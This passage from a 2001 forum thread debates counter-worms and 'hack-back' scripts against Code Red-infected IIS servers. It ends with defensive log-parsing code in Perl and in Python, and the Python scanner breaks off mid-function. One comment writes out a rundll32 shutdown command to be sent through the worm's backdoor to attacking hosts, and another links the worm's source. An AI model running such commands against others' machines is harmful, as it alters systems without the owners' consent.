    Once you do this, you are changing THEIR computers. And you might be a known entity. And their lawyers will be all over you. It is the same whether the system is infected or vulnerable. You are changing what belongs to somebody else. And that puts you in the same position as the author(s) of the CRs.

  181. Re:Already been done by Mals · · Score: 1

    Yeah, where is this script! This would make me a very happy man and it would certainly help reduce the load on my poor linux machine that is being hammered by those damn Win boxes! In a week's time, I have received over 2800 attacks and I'm not even a large corporation, just a cable user. This is ridiculous!

  182. ISP Level by TwistedTR · · Score: 1

    Could not something like this be done at an ISP level? With simple monitoring finding an infected machine could be done quickly, then the machine is removed from the network or its outbound traffic is disabled while either the ISP calls the client or an automatic email is sent telling them of the problem? It's not a virus at all so it would be legal, and the only downside would be a temporary loss of service until the sysadmin of the infected machine gets off his ass and downloads the patch that's been blasted on the tv/paper/radio for the last 2 weeks. People may complain that denying inet service to them because their machine is infected is a bad idea, but in a sense they are as bad as the virus creator themselves when they knowingly continue to let a machine run that's spreading a potentially very evil bug.

  183. Update worm by stevew · · Score: 1

    At my place of employment we're constantly receiving email based virus attacks from people that insist on running Outlook. We've jokingly come up with what we called the Update worm. The spec for this would be to detect if the user is using the virus-spreading Outlook, then download the free version of Eudora. Once that was accomplished it would transfer all the mail over to the Eudora format, then change all the desktop links, etc. to point at Eudora instead of Outlook. Then - remove Outlook!

    Only a joke mind you - never implemented!

    --
    Have you compiled your kernel today??
  184. Hasn't this already been discussed. by client32 · · Score: 1

    If my memory serves there has been a "good" worm set loose to fix problems caused by a "bad" worm. Here is the slashdot article on it.

  185. Because... by 11223 · · Score: 5, Insightful
    Everybody with the ability to do something like that and the lack of ethics to consider it realistically actually wants the rooted boxes for themselves?

    Seriously, folks, everybody who *could* write something like that either (a) recognizes that infecting someone's box is infecting someone's box, closing holes or not or (b) sees no problems in having the rooted boxen out there anyway. I doubt that anybody else actually has the skills to do it.

    1. Re:Because... by Yottabyte84 · · Score: 1

      They might have a reason for having their door open, but their box has no good reason to have a big fat security hole.

    2. Re:Because... by esper · · Score: 1
      Nonsense. Sending an HTTP request is trivial and every person reading this is capable of it. (How do I know? Because you sent an HTTP request to get this page.) Manually sending a command to any infected machine that probes you would be trivial, using only information which is within post #12 above.

      Automating it would be a little trickier, but still well within the grasp of anyone who has done a little CGI programming. Just drop in a script named /default.ida which sends an appropriate series of commands via HTTP to the requesting host.

      So much for your ability argument.

      The ethics side of it is, admittedly, open for more debate, but I disagree with both your (a) and (b) statements. I have no ethical problem whatsoever with using an existing back door to de-root a box. On the contrary, I believe that it would be a good thing to do. If you're walking across a parking lot and see an unattended car with one door not-quite-closed, is it unethical to close it? Why is it OK to secure someone else's car, but not their computer?

      I have the ability and the belief that disabling the infection is the right thing to do. The only reason that I haven't set up a script to clean up infected servers is because I believe that the legal system would frown upon such activity and I don't want to waste my time rotting in a prison cell.

    3. Re:Because... by IronChef · · Score: 2

      What we need is a body that examines, approves, and introduces counter measures.

      Microsoft for example, could include in the license agreements for the next outlook an agreement to allow MS to apply counter measures.

      That is actually a great idea. If only MS could catch a clue these days. (then again, maybe it is all part of their master plan!)

    4. Re:Because... by Anonymous Coward · · Score: 1, Interesting
      Ohh, I disagree.

      Most all of these virii/worms that have come out are child's play to a decent programmer.

      It really comes down to the ethics of it. I've even offered to my company that if they back me legally, I'll do it with the next one for the publicity.

      Obviously, this is not proper motive.

      It certainly can be argued however, given the virulence of Code Red and the new strains on new exploits that have been inspired, it may eventually be the only way to rid the net of it.

      You can say, sure let them disinfect their own boxes, but what about when it kills bandwidth? It may have been very localized this time, but wait till next time.

      Putting a server on the net is accepting responsibility for it. Unfortunately, a lot of admins either don't see it that way, or are incompetent.

      What we need is a body that examines, approves, and introduces counter measures.

      Microsoft for example, could include in the license agreements for the next outlook an agreement to allow MS to apply counter measures.

      For this to really be effective though, we need a more global solution.

    5. Re:Because... by Coulson · · Score: 1

      I have to humbly disagree. I think it's a great idea and I hope to see it done, and have considered doing it myself. I recognize that infection is infection, but the box is *already compromised*. I see no problem with coming in through the same already-used exploit to *clean* and *disinfect* the host. What's wrong with doing good? They're already broken and are actively attacking other boxes. Why not fix them before they infect other people?

  186. Re:yalla fp by Deijpimp · · Score: 0

    not

    --
    BTW has anyone seen my zig zag?
  187. Re:Its entirely possible by BlueUnderwear · · Score: 2
    > I haven't heard from a single client who has actually had downtime from it.

    At work, we had a Lotus Domino server that would crash whenever someone requested a non-existent Web URL from it (don't ask...). As most accesses to it are done from programs, or from links & bookmarks, this hasn't actually been a problem until recently...

    Since the beginning of August it started crashing every hour or so, making it rather difficult to work with. Then, this week it crashed every ten minutes... Initially we assumed that unknowingly a coworker was mistyping a URL, or doing some bizarre tests which crashed it. Then we understood what was really happening: it was CODE RED! Does that qualify as a client having downtime due to Code Red?

    However, in retrospect, this whole story had a good thing to it: it encouraged the guy in charge of Notes to find out why exactly it was crashing when asked for a non-existing URL... And he did indeed find the faulty config option and fixed it.

    Ok, now on the next task: another of our Domino servers crashes whenever somebody enters a bad password into the HTTP password dialog box for protected pages (yeah, yeah, I know...). Now that the weekend is approaching, and the kiddies are putting their final touches onto their new creations, could somebody please include an Authorization: Basic Tm90ZXM6c3V4b3Jz0 into the HTTP headers of the probes of his Code Red III, so that we have an excuse to fix that problem too? ;-)

    --
    Say no to software patents.
  188. It costs a lot to pay for other's inattention by dingbat_hp · · Score: 1

    Why not let the sysadmins who chose to use IIS keep up with the latest security patches and such?

    They aren't the ones with the problem:

    • Those getting thwacked often don't even know it has happened.
    • Code Red is causing more trouble by traffic swamping than it is by nuking some IIS boxes that the admins clearly weren't all that concerned about. This affects everyone, even those who kept their boxes clean.
    • If you're an admin in a large organisation, you'll be knee deep in Code Red hassle from desktop boxes you didn't even know existed. M$oft think everyone needed to be running a web server. I wouldn't be surprised if M$oft Barney had an embedded copy of Exchange in it (probably with XML and .NET extensions too). Pervasive intelligence is great, but not when it's coded by the clueless and security-inept morons of M$oft.
  189. Re:Its entirely possible by ryanvm · · Score: 4, Funny
    I'm sure folks will scream it's illegal and it probably is - but can't a case be made for 'self defense'? I mean if someone brandishes a gun at me am I not within my rights to shoot them or at least take their gun away?

    The problem is that 'self defense' only exists in a situation where your personal safety is at risk - like the above scenario.

    It's like asking: If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee?

    Basically, you can't violate someone else's rights unless your own safety is in danger.

  190. Re:I Hope You Keep Bail Money Near Your Gun OT by Evil+MarNuke · · Score: 0
    If you were a burglar in the UK you were (and are) very, very unlikely to get shot even before the "draconian" gun laws came in.

    Now he can just walk right in with his own gun, steal whatever he likes, rape the wife, all without a fear of being shot and killed.

    --
    The journey is better then the end.
  191. See Everything2 by l-ascorbic · · Score: 2, Informative

    That seems a bit like overkill. There is an Everything2 node on this subject with some simpler PHP code samples, including (full disclosure) one by me.

  192. Re:What if my 'default.ida' was a program? by krogoth · · Score: 1

    This sounds like a fun passive attack, but how well would it stand up if you were sued? Sure, if you put up a script on your site to clean servers that's completely legal, but when you go out of your way to rename it in a way that will trigger it when a server tries to attack you that could be seen as an intentional attack (no better than going through your logs and manually cleaning each IP). btw, can anyone point me to one of these scripts? :)

    --

    They that quote Benjamin Franklin on liberty and safety deserve neither.
  193. They'll never learn by kimihia · · Score: 1

    Look, the people who are infected are too dumb to look after something as critical as a web server. The reason they got in trouble was because they were too dumb to keep up with patches. Don't go and do their work for them, or they will never learn.

    What is the best way to learn? With a parent blasting you for a huge bandwidth bill. For your boss firing you for letting the company's database get owned. Having customers ripping you to shreds for destroying something important.

    Not until they realise the severity of their actions will they begin to learn. Let them stew in their own "security patch" juices for a bit, and when they are done, pull them out and point them at alternatives.

    As someone said before, otherwise you will hear conversations like this:

    • Hey Bob, you fixed your server for that worm thinga-me-doo-what?
    • Na Dave, I'm just waiting for the worm that patches it to come past. Someone will write one soon.
  194. I'm Batman by Punto · · Score: 2
    I don't get it. We all think Batman is cool, but nobody likes the idea of a virus fighting against evil?

    Of course, the author can't go around claiming responsibility (or posting stories on slashdot), that's not cool.

    --
    Stay tuned for some shock and awe coming right up after these messages!

  195. Good stuff... still avoids the real issue by Anonymous Coward · · Score: 0

    Whereas an anti-virus circulating around is a great idea (thought about that briefly a few days ago), I would suspect that the vast majority of webmasters/sysadmins have patched their systems. The problem lies in all those people running w2k with no knowledge of what IIS is, or that it might possibly be installed on their computer. Having seen the flurry of news on Code Red, I browsed back to localhost on my w2k box and found that I had IIS installed. (Fortunately, my w2k box isn't on a net connection) What really needs to be done is to inform all the uninformed that any NT or w2k box needs to be checked for IIS. If people are using the default installations, they are bound to have IIS installed without their knowledge...

  196. Bad Idea by Anonymous Coward · · Score: 0

    If you did that then the hacker that created code red might sue you for reverse engineering his code and distributing it! If the hacker lives in California then you are really screwed no matter where you are from.

  197. Go ahead and do it. by atrowe · · Score: 2, Informative
    I don't see why it couldn't be done. The CodeRed worm has already been modified several times and re-released. The original source can be found here

    Google cache because it looks like the original site has been removed.

    I suppose that it would be possible to use the ISAPI filter vulnerability in IIS to get into a system and patch that very same vulnerability. Maybe someone who knows more about this can clarify.

    --

    -atrowe: Card-carrying Mensa member. I have no toleranse for stupidity.

  198. Fighting fire with fire? by Drakino · · Score: 2

    Making a worm to fix the worm is just going to create more problems. My main slowdown of service comes from all the ARP requests from the thing scanning my neighborhood.

    Instead, (idea from another /. reader) make a CGI script called default.ida that fixes just that machine that tried to attack your server. Make sure it can deal with Code Red 1, otherwise once 2 is dead, 1 will be able to swing back easily to the unpatched servers. Also make sure it sends a bill to the company for "IT Consulting".

  199. This reminds me of the Fish Virus.... by AhNewBis · · Score: 2, Interesting

    The Fish virus, IIRC, would remove the Stoned/Michaelangelo virus if it was found, and then infect the machine itself.

    Further info about the virus is found here from Datafellow's virus database.

  200. Interesting solution. by CaptIronfist · · Score: 0
    However, this would still eat up bandwidth. How would you tell that virus to cease its activities in the end?

    $virus->terminate() if($virus->end()); ? ;)

    I mean it's still a virus and would still scan to propagate itself even though all systems are safe and secure. That just pushes the problem to another layer.

    There's a simple solution to every problem...

  201. Fixing the Lion Worm by OutOfMind · · Score: 1

    Our local sysadmin & I discussed this when the "fixing" worm first hove into view: it was a rather "on one hand/on the other hand" kind of conversation.

    On the one hand, you really don't want other people, however benignly, messing with the state of the software on your boxen (you should always know what the state of your software is). On the other hand, it had been 3 months since the patch for the lion worm came out -- at that point, you kinda feel that the responsible people should be up-to-date, and maybe the irresponsible ones could use some help.

    I guess, in the end, that the possibility that the "fixing" worm could contain bugs that might just make things worse is about the best argument for not doing this.

    ~k
  202. Re:I Hope You Keep Bail Money Near Your Gun by Anonymous Coward · · Score: 0

    I disagree.

    He may just be a burglar, but how do you know he isn't plotting to murder you and rape your wife after he picks up the good stuff? If I know those are his intentions I'll shoot him in a second and take my chances with the law, and if I'm not sure I probably won't shoot on sight but one wrong move and he's dead.

    A vigilante society would be one that would not wait for due process of law after a crime has been committed. What we are talking about here is defending home, family, and self, which is NOT a crime but a fundamental right. I have the right to self defense, and if someone is in my home on some unknown mission I'm not interested in letting him do whatever and then let the law take care of it. I'm going to stop him, doing whatever it takes to do that. I'd say that right is absolutely fundamental.

  203. I said this before ... by LoudMusic · · Score: 0
    I made this comment last week and got modded down. AVENGE ME!

    Good virus

    ~LoudMusic

    --
    No sig for you. YOU GET NO SIG!
  204. Attack the worm with a bat, not another worm... by Anonymous Coward · · Score: 0

    Ethics, smethics...if someone breaks into your home, it seems reasonable to hit them over the head with a bat. So why not whack any machine that tries to attack your machine (whack == exploit the same hole to patch them such that they are no longer affected) The folks who think this is "unethical" probably wouldn't break into a house to stop a rape when they hear screams for help either... Doing nothing can be unethical sometimes too.

  205. Re:I Hope You Keep Bail Money Near Your Gun by operagost · · Score: 1
    If someone comes into my house and wants to take all my stuff, I'm going to shoot him and let the D.A. decide whether to prosecute. In this country, as a wise man said, we have a right to "life, liberty, and the pursuit of happiness". Requiring law-abiding citizens to allow any brigand to boldly stroll into a person's house and demand all their possessions denies me my rights. If pointing a loaded weapon at him doesn't make him realize the error of his ways, then that's not my problem.

    Maybe in places like the UK they don't mind that robberies while the owner is home have gone up since the draconian gun laws. I do.

    --

    Gamingmuseum.com: Give your 3D accelerator a rest.
  206. Understanding by virg_mattes · · Score: 2

    > Ethics is religion. Faith is not a Religion. You must understand the difference.

    I'm going to have to disagree on this point. Ethics and religion are very different things. They are actually not even directly related to each other. The link between the two is morality, to which both are related. To give an example, it's possible for an agnostic person to act in an ethical manner. Actually, it's possible for any person to act in an ethical manner. It's also possible for someone with a religious ideal to act in an unethical manner without violating his/her religious convictions (the Inquisition is an old example, but it fits, so I'll use it for ease). Religion is a belief system. Morality is a rule set based on the belief system. Ethics is adherence to generally accepted codes of behavior.

    And, in response to your second sentence, religion is specifically a belief system. So, while linguistically your statement is correct (one can have faith without a directed religion, such as "faith in the goodness of mankind"), by definition one cannot have a religion without faith.

    Virg

  207. Understood Consent by pyite · · Score: 1

    Something to this effect may have been said already. But here's a thought. Designate a port (one of the high ones) to accept a query equivalent to, "Do you allow us to fix your computer?" where the secure key has to match a list of trusted ones. Granted, this may raise all sorts of privacy issues, but as long as it was consensual, and asked of the owner of the computer before being enabled at all, it might be alright. For instance, I'd allow the Debian security team to apply a patch to a hole in my system. This provides no technical basis to do so, as the hole is already there. Certainly no one with malicious intent is going to bother to ask in the first place, so it doesn't seem as if we have to worry about forged keys and the like. All it does is provide a simple response of "Yes; Date/Time; MyIP; YourIP; original request XOR constant". Nothing extravagant at all. If Microsoft was honest about it, and I think they could be, (security holes look bad enough, not being dirty about a good method to cover them up is smart) then stuff like this would be eradicated much more quickly.

    --

    "Nature doesn't care how smart you are. You can still be wrong." - Richard Feynman

  208. Re:You could do that, but don't! by Borogove · · Score: 1
    Not true. The difference between countervirus and virus is that the former closes up any loop-holes that can be used for further attacks. Sure, the cracker could reverse-engineer the countervirus and set off a new-variant virus to combat it, but by the time the new virus gets active, the size of the battle field will have decreased.

    Unless the initial virus leaves behind a back-door that the writer of the counter-virus didn't see, or the virus can mutate in such a way that it isn't destroyed by the counter-virus.

    --
    There has been a major scientific break-in
  209. Preferable method by Snowfox · · Score: 3, Informative
    I'd rather it used the IIS log file to try to spread itself to every system that had tried to infect it, then executed a
    %windir%\System32\rundll32.exe user32.dll,exitwindows

    (which you can do manually right now with the worm-installed back door.)

    Leave that going long enough, and the infected systems will just keep powering off until the IIS feebs get a clue.

    1. Re:Preferable method by Snowfox · · Score: 1, Interesting

      I'd rather it used the IIS log file to try to spread itself to every system that had tried to infect it, then executed a

      %windir%\System32\rundll32.exe user32.dll,exitwindows

      (which you can do manually right now with the worm-installed back door.)

      Leave that going long enough, and the infected systems will just keep powering off until the IIS feebs get a clue.

      p.s. - if you're gonna mod it - mod it as funny. In the real world, this is what we call a capital Bad Idea.

    2. Re:Preferable method by jspaleta · · Score: 2, Interesting
      I wonder what the legality of this is? Having the infected system which is attacking you power down is not viral, and actually sounds like a very good disarming mechanism. In legal terms this seems like a very clear "self-defense" action aimed exclusively at stopping the illegal trespass. It's sort of like having tire spike strips in your parking lot to prevent people from coming in the wrong way

      You are allowed a certain modicum of property damage when acting in self-defence. How much damage you can do to the violator is subjective and depends on the threat being presented to you and your property. I don't see how a non-invasive shutdown of the attacking system is out-of-line considering the threat to your computer system and to the larger community a virus represents.

      It's true that the polite thing to do is to just email the offending system's maintainer, but in situations where a virus has a potential to cause large material harm (I'm thinking virus infected machines as trojaned DoS zombies, or mail server clogging because of the virus spawned emails) you could argue that forcing an attacking infected server to shutdown is a legit self-defense action to prevent your own property damage. -jef

  210. Re:You could do that, but don't! by Mendax+Veritas · · Score: 1

    Using, presumably, the calculus of intentionality...

  211. Re:Its entirely possible by jcorkery · · Score: 1

    Actually, legal issues surrounding this may have already been addressed in the medical world. One of the original polio (I think) vaccines worked like this: the vaccine although "harmless" was still a contagious virus and thus if one person were vaccinated, people around that person could "catch" the vaccine. I don't remember too many of the details, but I do remember learning about contagious vaccines in an immunology course and I think polio was the first one and that it did work. However, I don't remember how long it was used for and whether or not contagious vaccines are still in use.

  212. Re:Its entirely possible by Anonymous Coward · · Score: 0

    This is why all diabetics, epileptics, retards, and junkies must be killed before they have a chance to threaten innocent people in their own homes. If they're such dangers, they must be at least locked up in institutions, both for our own safety and their own (better to lock them up than have them wandering into random homes and getting shot.)

  213. Microsoft's role. by hivolt · · Score: 1

    The main problem the anti-worm tries to solve is the slow response by computer administrators. Microsoft fixed its problem, but had to resort to using the press to get the average user's attention. What Microsoft could do is have a built-in Windows feature that tells the user when there is a patch they need to install. Perhaps ClipIt could pop up with a link to a Microsoft download page. This would not force the user to install anything he doesn't want to install, and at the same time it would cater to M$ users who don't want to spend time keeping up with computer security. Though they're using the user's machine to tell them about the problem, the user agreed to this by agreeing to use Windows.

    1. Re:Microsoft's role. by ahrenritter · · Score: 1

      They actually have this. It is called the "Windows Critical Update Notifier". It periodically logs onto Windows Update and checks to see if there are any new critical updates that pertain to your system and haven't been installed yet.

      --

      All I wanted was a rock to wind a piece of string around, and I ended up with the biggest ball of twine in Minnesota
  214. You could do that, but don't! by Mendax+Veritas · · Score: 4, Insightful

    A "white hat worm" of this sort could be made, but its deployment would be just as illegal as the original "black hat worm" it was created to fight. You're still making unauthorized use of someone else's computer. It doesn't matter that you have good intentions. And what if a bug in your code crashes some machines? How do you prove it wasn't intentional, and that your "white hat worm" isn't really a "black hat worm" in disguise?

    1. Re:You could do that, but don't! by AndroidCat · · Score: 1

      It's sometimes interesting to browse the infected sites. (After all, you know that they have a web server.)

      It looks like some people are already taking (unethical) action:

      http://64.50.103.8
      "Your system is infected with Code Red II and it attempted to hack my server. Please fix your server. "

      There's the clueless like http://64.230.195.33/ and http://64.230.33.150/ which are "Under Construction", so they probably don't even know that they're running IIS. ARRRGGH!

      A number of others fail with a "too many connections" error. Busy little worm! Hmm... I didn't just /. those urls! :^)

      --
      One line blog. I hear that they're called Twitters now.
    2. Re:You could do that, but don't! by Anonymous Coward · · Score: 0

      How do you prove it wasn't intentional...?

      Formally.

    3. Re:You could do that, but don't! by bughunter · · Score: 3, Interesting
      Yes, that appears to be the prevalent ethical standard.

      But I think people are overlooking a more ominous repercussion, technically and ethically: Setting a precedent. If the precedent were set that it's OK to loose countercode upon the world, think of what might result.

      In other words, if counterviruses and antiworms became commonplace, it would turn the internet into one big war zone for autonomous code. And I can't even imagine what might result if an arms race broke out in that contest, though I expect some of its fruits would be quite frightening. I've already drawn the analogy to Core War in a previous thread.

      --
      I can see the fnords!
    4. Re:You could do that, but don't! by Necroman · · Score: 1

      I see it now. Browsing SourceForge, and I came across a new project.. "WhiteWorm". Open source virus anti-virus.

      --
      Its not what it is, its something else.
    5. Re:You could do that, but don't! by Anonymous Coward · · Score: 0

      Don't send it from your machine or a machine that is known to be used by you. I really don't think getting caught is a problem, they didn't catch the original virii writer. I do understand the part where you say a bug might crash some machines, but it will only crash NT and win2k so I don't think that it is a bad thing :). If a machine is already rooted (if you want to call it that), then it is their own fault, and they are causing more trouble than the new clean worm would cause.

    6. Re:You could do that, but don't! by Cro+Magnon · · Score: 1

      I'd have no problem if I just got a message that said "You are infected with CodeRed! Please run this patch". But I would NOT appreciate something like "I have just autorun a patch to save you from CodeRed". I want to control what's on my machine, and whether it's a white or black hat, it's still an intrusion!

      --
      Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
  215. Can we use the ip to warn those infected by bear_phillips · · Score: 1

    Do any of the ISPs accept lists of infected ips and then send a warning email to those users? I looked through my logs, and saw code red hits from a local smalltime website. I emailed the sysadmin and he patched his site and thanked me for the info. But most of the hits are from xxxx.rr.com.
    I would love to be able to forward a list of ips back to the ISP and have them send out the emails.

    --
    http://www.windmeadow.com/
  216. Out of the frying pan... by babbage · · Score: 2
    I've heard -- and this may be apocryphal so please correct me if I've got this wrong -- that the narcotics that we all know and love had an interesting evolution over the course of the last 150 years or so.

    Apparently, it seems that in the early 1800s, there was a general problem with people smoking too much opium, so people came up with a supposed cure for it -- morphine! Of course in hindsight this wasn't any better than opium, but at least it had a pain relieving effect so there was some medical use for it (and still is). Sure enough, former opium smokers got hooked on morphine, and a new cure was needed. What did we get? Heroin! This was much worse, had no worthy side effects, and has generally been a huge headache ever since. What was the solution? Go cold turkey? Of course not, we came up with yet another new drug -- methadone. This one seems to have the great benefit of not being worse or more addictive than its predecessor, but that just means that people don't want to stop using heroin in favor of methadone, so while methadone may not be worse, it does little good either.

    Like I say, this may not actually be true, but I think it illustrates the point very well. Even if it isn't true, there are still similar examples all over the place -- people that give up cigarettes for nicotine gum, etc.

    This sort of suggestion has the same critical flaw: it might look good on paper, but in practice you're just trading one nasty thing for another. Sending out a benevolent trojan sounds like a nice idea, but how do you know that it'll be benevolent anyway? Are you sure it isn't going to be vulnerable to some flaw that will do more harm than good? You've checked all your buffers and are careful in what your program accepts and strict in what it sends out? Moreover, you're confident that, even if it *is* perfectly benign (which, let's be honest, is a tricky assertion at best, and very hard to verify) once it's out in the wild can you guarantee that your code isn't going to get hijacked by someone less saintly or all-knowingly proficient as you surely are?

    I doubt it.

    These sorts of proposals sound nice but are fraught with danger and likely to come to a bad conclusion, both technically and, let's not forget, legally. This sort of idea comes up every now and then -- K5 is debating it right now, too -- but it's never a good idea and in practice it will never reliably work. It's clever & tempting, but raises more problems than it solves, just like trading morphine for heroin...

  217. Re:I Hope You Keep Bail Money Near Your Gun by Unknown+Bovine+Group · · Score: 1
    Where do YOU live? I'm coming over to steal your stuff.

    --
    m00.
  218. Re:I Hope You Keep Bail Money Near Your Gun by WNight · · Score: 2

    I agree that 'stuff' is worth less than a life. However I don't think that's the end of the story.

    Some people, to me, are of negative worth. These would be the rapists and murderers. I wouldn't assume someone was of negative worth, but I think the simple fact of finding them in my house without my permission, despite locks, would be fairly strong evidence for that.

    Now, I don't necessarily think these people should be killed, but my aversion to killing is sufficiently lowered in those (hypothetical) circumstances, that I would be willing to shoot, if I thought it was warranted.

    Now, what is warranted... Tough question. To me, seeing some kid trying to break into your garage isn't. Seeing someone walking *out* of your house with the TV, isn't. Hearing the door be kicked down and seeing someone come in, is.

    If I could clearly see them and tell they didn't have a weapon handy, I'd give them a warning to leave. If I couldn't, why would I want to risk my life and that of my family, by giving them a warning which they might use only as a chance to duck for cover before going for their weapon?

    There's been a rash of home invasions in my area, which often lead to murder. I don't know about you, but my door has never been kicked down, I think I'd assume the worst, and in that case, be willing to defend myself. Any criminal intending only theft should either announce himself "Hey, I'm just here to steal the TV" or risk my assuming that since he broke the door down, he's probably got more sinister motives, given the rash of invasions/murders.

  219. Re:That's the worst idea I've ever heard by Crag · · Score: 1

    While what you say is factually true (spoofing the source is tricky), the principle of not fighting fire with fire is still reasonable. Whenever you automatically respond to an attack with another attack you open up the potential for an explosive situation.

    The best defense is a good defense. Education and superior software are the safest, most effective cure for network-transmitted-infections. :)

  220. @work by clinko · · Score: 2

    A funny story from where I work. Some guy took the code from the melissa virus and tried to do the same thing. While doing it, he accidentally ran it and set off his screwed up version of it across our network. Big fun :)

    1. Re:@work by Raging+Idiot · · Score: 0
      Yeah, that all seems to be a problem for the willy-sucking faggots on my corporate network.

      I've been spending a lot of time reading the BOFH manuals. I'm thinking there's some really good ideas in there. Mmm, electrocution through the keyboard....

      --


      Stupidity never felt so good.
    2. Re:@work by Anonymous Coward · · Score: 0
      there is no way that he is going to "relearn" how to use the Internet

      So? That's quite understandable.

      I don't see your problem. Internet should be EASY to use. Otherwise only an elite group of people will be able to use it. If the AOL interface has already achieved the level that a joe-sixpack can use the Internet, then it should become the mainstream commercial interface to the information superhighway which is the right of every citizen.

      One of the most serious problems I have with the Internet is that it is still not equally accessible for everyone. And I mean everyone. Senior-citizens, financially handicapped citizens, ethnic minorities, people with no computer skills and so on. Otherwise a huge segment of the population will be seriously disadvantaged. I'm sure you and people like you feel comfortable in your ivory tower of technical knowledge, but face it. It's not fair. The Net belongs to everyone. You're just trying to protect your privileged knowledge.

    3. Re:@work by Anonymous Coward · · Score: 0

      Clearly you are confused. It's bookmarks and FAVORITES, not shortcuts...

    4. Re:@work by Anonymous Coward · · Score: 0
      I don't know.

      You tell me!

    5. Re:@work by Raging+Idiot · · Score: 0

      Everyone knows what "Internet" means. Not everyone understands that the world wide web is just one small part of that. Cater to the users by calling it Internet. It's no different from installing AO"Hell" on every computer, except that renaming an icon doesn't cause the entire corporate network to crash down around you.

      --


      Stupidity never felt so good.
    6. Re:@work by unitron · · Score: 2
      If clicking the icon launches a browser, shouldn't the icon be labeled "Browser", or perhaps whatever actual browser it launches? Didn't I hear a rumor somewhere that there's more to the internet than just HTML?

      Or is it easier to make fun of and complain about ignorant users if you do what you can to keep them that way?

      --

      I see even classic Slashdot is now pretty much unusable on dial up anymore.

  221. It sounds good in theory... by r0ach · · Score: 0

    But even if someone made an "anti-virus" virus, they themselves would probably get screwed over... Even Robin Hood isn't immune to the law...

    --
    -- www.RoachMcKrackin.com
    1. Re:It sounds good in theory... by mini+me · · Score: 1

      Would a

      net send %COMPUTERNAME% Warning you have been infected with the code red worm, blah blah blah

      not be even more effective? Not only that, you won't have to write to their hard drive which the user may not like. And besides, who is going to miss a big pop-up message?? Whereas a file may be missed.

    2. Re:It sounds good in theory... by wtmcgee · · Score: 1

      unfortunately it raises a lot of privacy issues. people that get caught for the whole virus bit are in trouble not just for being malicious to another's machine, but for gaining unauthorized access. no matter what the intent would be, you would still be making changes to someone's PC without their consent.

      --
      *** For a better tomorrow, change your life today ***
  222. Applied to Nanotechnology Virii... by omnirealm · · Score: 1

    For now, I present this idea as a theoretical one. But in the not-so-distant future, I think we can all agree that this is not an "if" scenario, but a "when."

    Our biological immune system is designed to fight biological threats. For the most part, these threats have been encountered some time in the past, and all immune systems that were not able to combat the threat were compromised, and the host died. Due to mutations, only a few immune systems had some characteristic that allowed them to defend against the threat. These immune systems were slight deviations from the "mainstream" immune system in the gene pool at the time. All hosts that had the "mainstream" immune system perished, and those resistant to the threat survived. Due to the void created by the deaths, those with the resistive immune system had more access to the resources left behind, and they reproduced and created the new dominant gene pool, which is resistant to the disease. This is known as "natural selection."

    Suppose a nanobot virus is developed against which the human immune system cannot possibly defend. In this case, the only thing that would save the human race would be another nanobot that augments the immune system to provide protection against the new threat.

    In this case, most of the human race would not have the resources, or even the means, to learn about this "white-hat" nanobot and to obtain it. Would it be ethical to start distributing this anti-viral nanobot in community water systems?

    --
    An unjust law is no law at all. - St. Augustine
    1. Re:Applied to Nanotechnology Virii... by omnirealm · · Score: 1

      What I meant to say... the information-retrieval resources or the physical means to obtain the good nanobots :-)

      --
      An unjust law is no law at all. - St. Augustine
  223. That's what's so great about living in Texas by JudgeFurious · · Score: 1

    Here if it's after dark and you see someone breaking into your car out in the driveway you are within your legal rights to shoot them. It falls under something called "Criminal Mischief at Night" and while it is not a case where you cannot be charged with shooting the guy it is a defense to prosecution that has been used with a great deal of success in this state. God I love living in Texas!

    --
    Appended to the end of comments you post. 120 chars.
  224. Re:There is another way... by bear_phillips · · Score: 1

    Here is a simple script to parse out the offending IPs and timestamp on linux/apache systems. It removes dupes too. This may be easier to read

    #!/usr/bin/perl
    use strict;
    use warnings;

    # open the log file, and say why if that fails
    open(my $log, '<', '/usr/local/apache/logs/access_log')
        or die "cannot open access_log: $!";

    my %ips;
    while (my $line = <$log>) {
        # Get the code red log lines
        next unless $line =~ /default\.ida/;
        # Split out just the IP and time
        my ($validstuff, $junk) = split(/"GET/, $line);
        my ($ip, $time) = split(/- -/, $validstuff);
        $ip =~ s/ //g;
        # Put them in a hash to get rid of dupe IPs
        $ips{$ip} = $time;
    }
    close($log);

    # Print it back to the screen
    foreach my $tmp (keys %ips) {
        print "$tmp $ips{$tmp}\n";
    }

    --
    http://www.windmeadow.com/
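Added example, not code from the thread or any of its posters: a Python log scanner in the same spirit as the Perl script above and the "forward a list of ips back to the ISP" idea in comment 215. It extracts the attacking clients from Apache common-log lines, keeps one record per IP with hit count and first/last timestamp, and buckets the addresses by /16 so everything from one provider's block can go into a single report. The log lines, addresses and timestamps are constructed for this example; the probe lines only imitate the shape of the request (a run of N or X after /default.ida?) and carry no payload.

```python
import ipaddress
import re

# Constructed sample lines in Apache common log format. Addresses and
# timestamps are made up; the two probe lines imitate only the shape of a
# Code Red request (a long run of N or X after /default.ida?).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2001:10:21:03 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 281
192.0.2.77 - - [04/Aug/2001:10:22:15 -0500] "GET /index.html HTTP/1.0" 200 1043
10.0.0.5 - - [04/Aug/2001:11:05:44 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 281
198.51.100.9 - - [05/Aug/2001:02:13:59 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 281
203.0.113.4 - - [05/Aug/2001:02:14:00 -0500] "GET /robots.txt HTTP/1.1" 200 58
this line is not a log entry at all
"""

# One common-log-format entry: client, ident, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A Code Red probe asks for /default.ida with a long filler run of N or X.
PROBE_RE = re.compile(r'^/default\.ida\?(N{8,}|X{8,})', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one log line, or None if it is not well formed."""
    m = LOG_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def probe_marker(path):
    """Return 'N' or 'X' for a Code Red-style request path, else None."""
    m = PROBE_RE.match(path)
    return m.group(1)[0].upper() if m else None


def scan_log(lines):
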